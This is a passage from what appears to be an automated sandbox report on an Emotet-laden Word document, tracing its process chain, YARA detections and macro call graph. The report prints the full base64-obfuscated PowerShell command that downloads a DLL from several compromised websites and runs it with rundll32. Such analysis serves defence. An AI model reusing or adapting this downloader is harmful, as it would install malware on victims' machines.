MAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
Imagebase:	0x49de0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 1320 Parent PID: 2424

General

Start time:	08:41:42
Start date:	06/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xffda0000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1228 Parent PID: 2424

General

Start time:	08:41:43
Start date:	06/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
Imagebase:	0x13f880000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2108701302.0000000001C26000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2108539284.0000000000196000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2528 Parent PID: 1228

General

Start time:	08:41:50
Start date:	06/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Imagebase:	0xffd50000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2328 Parent PID: 2528

General

Start time:	08:41:51
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2110989344.0000000000210000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2788 Parent PID: 2328

General

Start time:	08:41:51
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vzmpbxrgkn\sbqrrdzml.sop',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2112508539.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2868 Parent PID: 2788

General

Start time:	08:41:52
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ukzmpnozo\pnpaswzz.stx',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113546324.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2700 Parent PID: 2868

General

Start time:	08:41:53
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Awonhbftone\yxjcuugtve.ehy',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2115211069.0000000000240000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2468 Parent PID: 2700

General

Start time:	08:41:53
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sbbifaxj\wcgyhcz.btb',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2118205619.0000000000360000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2856 Parent PID: 2468

General

Start time:	08:41:54
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ypmeuqhummj\uoygpjaare.osc',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2119457993.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2344 Parent PID: 2856

General

Start time:	08:41:55
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqivdealrt\nmtqooojq.rit',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2122389550.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2984 Parent PID: 2344

General

Start time:	08:41:56
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzdlyz\nbltd.fbg',Control_RunDLL
Imagebase:	0x1f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2349226976.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: A5gd21klfqu9c6rs

Declaration

Line	Content
1	Attribute VB_Name = "A5gd21klfqu9c6rs"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503

APIs	Meta Information
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Zw1k7hcmdl66
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Item
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Hyii7r76oq89
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: diCXTi
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: NZiApKAp
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vrYYHIDxI
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: gzTFLxb
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: PjNhJNA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: oAaNlB
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: sySRJ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UwyYSBsBN
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tpOgXmm
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: MHYlQAD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: GznGGHyG
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: bbsIZ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Name
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Application
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: swNGWdd
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: rJEkbLH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vEBqHrDnD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tWcKo
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: LzxxRHG
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: EKezHIC
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: DpYbmDA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hDJDJ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: dXiwA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hFSyAfFrF
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hXxQDACJA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: xkQqDXCcD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Len
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lBenBDA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UavHTIBHo
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: IcAHwPH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: BNmrm
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FLtYjKHC
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: qAUhkIMz
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Create
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: V2enhc4htwl7z6bh
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Thriap3q9rgf3yy9y
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: zZuzBZGD
